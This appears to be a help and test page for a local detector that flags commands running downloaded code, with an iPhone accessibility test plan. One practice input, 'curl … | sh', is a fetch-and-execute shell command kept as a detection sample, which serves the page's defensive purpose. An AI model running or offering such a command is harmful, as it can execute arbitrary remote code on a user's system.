Try it. Understand it. Help improve it.

PS looks for a few specific ways a command runs downloaded or decoded code. It does not decide whether the code is safe or whether its author is a scammer.

Your first check

  1. Open PS and choose Check on this device.
  2. Paste one example below. Select Check answer. Read the short result and open its evidence if you want the details.
  3. Clear the example and try the next one. Never run these example commands.

The check runs on your device. No account, subscription or answer upload is needed. No finding means that this method did not find its supported pattern; it is not a safety clearance.

Practice with two examples

Pattern example: this downloads code into a shell. PS should find its supported pattern.

curl https://example.invalid/test.sh | sh

Download example: this saves a file. PS should not find a fetch-to-execution pattern.

curl https://example.invalid/test.sh -o test.sh

These are synthetic practice examples, not independent accuracy evidence. The preview does not fetch these URLs or execute the commands.

Test your iPhone 14 Plus

  1. Record your iOS version in Settings → General → About. Open this site in Safari.
  2. Try both examples. Check that controls and results fit in portrait and landscape, and that you can enlarge text without losing an action.
  3. Turn on VoiceOver in Settings → Accessibility. Navigate to PS, the input, Check, the result, evidence and Clear. Note any missing name, confusing announcement or lost focus.
  4. Use the checker’s offline setup instructions. After its assets finish preparing, turn on Airplane Mode and repeat both checks. Save a result, reopen the site, then remove the offline copy using its instructions.
  5. Restore your normal settings and record what actually worked or failed. A blank or interrupted check is not a negative finding.

Physical-phone results are still pending. Automated WebKit tests are useful but cannot stand in for your phone or VoiceOver. Android/TalkBack and independent screen-reader review remain separate.

Optional: keep a feedback file

Choose three short answers and preview exactly what goes into the file. No example, name, email, answer hash or device identifier is included. This page does not upload, retain or enroll anything. Downloading does not grant permission to train on your content.

User-reported feedback helps investigate problems; it is not an independently verified label. No private research intake is connected yet. Do not post private examples in public issues.

Help validate the tag

Your practice tests establish how the product works for you. Independent accuracy testing needs new authorized examples and reviewers who have not seen the detector’s answers.
